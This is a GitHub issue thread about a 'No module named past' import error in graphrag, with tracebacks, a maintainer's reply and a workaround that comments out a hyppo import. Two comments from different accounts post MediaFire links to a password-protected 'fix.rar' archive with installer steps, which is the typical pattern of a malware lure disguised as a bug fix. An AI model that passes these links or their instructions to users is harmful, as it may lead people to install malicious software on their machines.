### ISSUE TITLE
[Issue]: from past.utils import old_div ModuleNotFoundError: No module named 'past' 

### ISSUE THREAD

**Issue by AdithyaGiridharan** [microsoft/graphrag#1028]
### Do you need to file an issue?

- [X] I have searched the existing issues and this bug is not already filed.
- [ ] My model is hosted on OpenAI or Azure. If not, please look at the "model providers" issue and don't file a new one here.
- [ ] I believe this is a legitimate bug, not just a question. If this is a question, please use the Discussions area.

### Describe the issue

`python -m graphrag.index --init --root ./ragtest`

when running the above command i get the following error,
`File "/home/tk/.local/lib/python3.10/site-packages/hyppo/kgof/fssd.py", line 4, in <module>
    from past.utils import old_div
ModuleNotFoundError: No module named 'past'`

I am using python version : Python 3.10.11

### Steps to reproduce

i refered the below url,
https://microsoft.github.io/graphrag/posts/get_started/

ran following commands,
`pip install graphrag`
`mkdir -p ./ragtest/input`
`curl https://www.gutenberg.org/cache/epub/24022/pg24022.txt > ./ragtest/input/book.txt`
`python -m graphrag.index --init --root ./ragtest`

### GraphRAG Config Used

not applicable

### Logs and screenshots

tk@TK:~$ python3 -m graphrag.index --init --root ./ragtest
Traceback (most recent call last):
  File "/usr/lib/python3.10/runpy.py", line 187, in _run_module_as_main
    mod_name, mod_spec, code = _get_module_details(mod_name, _Error)
  File "/usr/lib/python3.10/runpy.py", line 146, in _get_module_details
    return _get_module_details(pkg_main_name, error)
  File "/usr/lib/python3.10/runpy.py", line 110, in _get_module_details
    _import_(pkg_name)
  File "/home/tk/.local/lib/python3.10/site-packages/graphrag/index/_init_.py", line 40, in <module>
    from .run import run_pipeline, run_pipeline_with_config
  File "/home/tk/.local/lib/python3.10/site-packages/graphrag/index/run.py", line 59, in <module>
    from .verbs import *  # noqa
  File "/home/tk/.local/lib/python3.10/site-packages/graphrag/index/verbs/_init_.py", line 9, in <module>
    from .graph import (
  File "/home/tk/.local/lib/python3.10/site-packages/graphrag/index/verbs/graph/_init_.py", line 10, in <module>
    from .layout import layout_graph
  File "/home/tk/.local/lib/python3.10/site-packages/graphrag/index/verbs/graph/layout/_init_.py", line 6, in <module>
    from .layout_graph import layout_graph
  File "/home/tk/.local/lib/python3.10/site-packages/graphrag/index/verbs/graph/layout/layout_graph.py", line 13, in <module>
    from graphrag.index.graph.visualization import GraphLayout
  File "/home/tk/.local/lib/python3.10/site-packages/graphrag/index/graph/visualization/_init_.py", line 6, in <module>
    from .compute_umap_positions import compute_umap_positions, get_zero_positions
  File "/home/tk/.local/lib/python3.10/site-packages/graphrag/index/graph/visualization/compute_umap_positions.py", line 6, in <module>
    import graspologic as gc
  File "/home/tk/.local/lib/python3.10/site-packages/graspologic/_init_.py", line 8, in <module>
    import graspologic.inference
  File "/home/tk/.local/lib/python3.10/site-packages/graspologic/inference/_init_.py", line 6, in <module>
    from .latent_distribution_test import latent_distribution_test
  File "/home/tk/.local/lib/python3.10/site-packages/graspologic/inference/latent_distribution_test.py", line 7, in <module>
    from hyppo.ksample import KSample
  File "/home/tk/.local/lib/python3.10/site-packages/hyppo/_init_.py", line 5, in <module>
    import hyppo.kgof
  File "/home/tk/.local/lib/python3.10/site-packages/hyppo/kgof/_init_.py", line 2, in <module>
    from .fssd import FSSD, FSSDH0SimCovObs
  File "/home/tk/.local/lib/python3.10/site-packages/hyppo/kgof/fssd.py", line 4, in <module>
    from past.utils import old_div
ModuleNotFoundError: No module named 'past'

### Additional Information

- GraphRAG Version: graphrag 0.3.1
- Operating System: windows11,ubuntu22.04
- Python Version: Python 3.10.11
- Related Issues: not applicable

**Comment by AlonsoGuevara** [comment]
Thanks for the report!
Seems like some dependency may have published a yanked update, as we also started facing this suddenly and intermittently.
I'm publishing a new PR to address this, will link it.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by d2epak** [comment]
Hi, I am trying to replicate this tutorial : https://github.com/TheAiSingularity/graphrag-local-ollama

and I am seeing this same error at the same step, could you please advise of a fix? 

Windows 11, python 3.10

C:\Users\rupal\graphrag-local-ollama>C:\Users\rupal\anaconda3\python -m graphrag.index --init --root ./ragtest
Traceback (most recent call last):
  File "<frozen runpy>", line 189, in _run_module_as_main
  File "<frozen runpy>", line 148, in _get_module_details
  File "<frozen runpy>", line 112, in _get_module_details
  File "C:\Users\rupal\graphrag-local-ollama\graphrag\index\__init__.py", line 40, in <module>
    from .run import run_pipeline, run_pipeline_with_config
  File "C:\Users\rupal\graphrag-local-ollama\graphrag\index\run.py", line 59, in <module>
    from .verbs import *  # noqa
    ^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\rupal\graphrag-local-ollama\graphrag\index\verbs\__init__.py", line 9, in <module>
    from .graph import (
  File "C:\Users\rupal\graphrag-local-ollama\graphrag\index\verbs\graph\__init__.py", line 10, in <module>
    from .layout import layout_graph
  File "C:\Users\rupal\graphrag-local-ollama\graphrag\index\verbs\graph\layout\__init__.py", line 6, in <module>
    from .layout_graph import layout_graph
  File "C:\Users\rupal\graphrag-local-ollama\graphrag\index\verbs\graph\layout\layout_graph.py", line 13, in <module>
    from graphrag.index.graph.visualization import GraphLayout
  File "C:\Users\rupal\graphrag-local-ollama\graphrag\index\graph\visualization\__init__.py", line 6, in <module>
    from .compute_umap_positions import compute_umap_positions, get_zero_positions
  File "C:\Users\rupal\graphrag-local-ollama\graphrag\index\graph\visualization\compute_umap_positions.py", line 6, in <module>
    import graspologic as gc
  File "C:\Users\rupal\anaconda3\Lib\site-packages\graspologic\__init__.py", line 8, in <module>
    import graspologic.inference
  File "C:\Users\rupal\anaconda3\Lib\site-packages\graspologic\inference\__init__.py", line 6, in <module>
    from .latent_distribution_test import latent_distribution_test
  File "C:\Users\rupal\anaconda3\Lib\site-packages\graspologic\inference\latent_distribution_test.py", line 7, in <module>
    from hyppo.ksample import KSample
  File "C:\Users\rupal\anaconda3\Lib\site-packages\hyppo\__init__.py", line 5, in <module>
    import hyppo.kgof
  File "C:\Users\rupal\anaconda3\Lib\site-packages\hyppo\kgof\__init__.py", line 2, in <module>
    from .fssd import FSSD, FSSDH0SimCovObs
  File "C:\Users\rupal\anaconda3\Lib\site-packages\hyppo\kgof\fssd.py", line 4, in <module>
    from past.utils import old_div
ModuleNotFoundError: No module named 'past'

**Comment by mukherjeesrijit** [comment]
Hi, I solved it like this. I saw that there was some update in the hyppo->kgof. So I went inside the hyppo and in the __init__.py I commented the "# import hyppo.kgof", because when I traced back the code that kgof is actually not used. Only the "hyppo.ksample" is used. So you can infact comment out the others. I hope this helps. This is what the __init__.py file inside hyppo looks like right now:

`import hyppo.discrim
import hyppo.independence
import hyppo.ksample
import hyppo.time_series
# import hyppo.kgof
import hyppo.tools
import hyppo.d_variate
import hyppo.conditional

__version__ = "0.4.0"
`
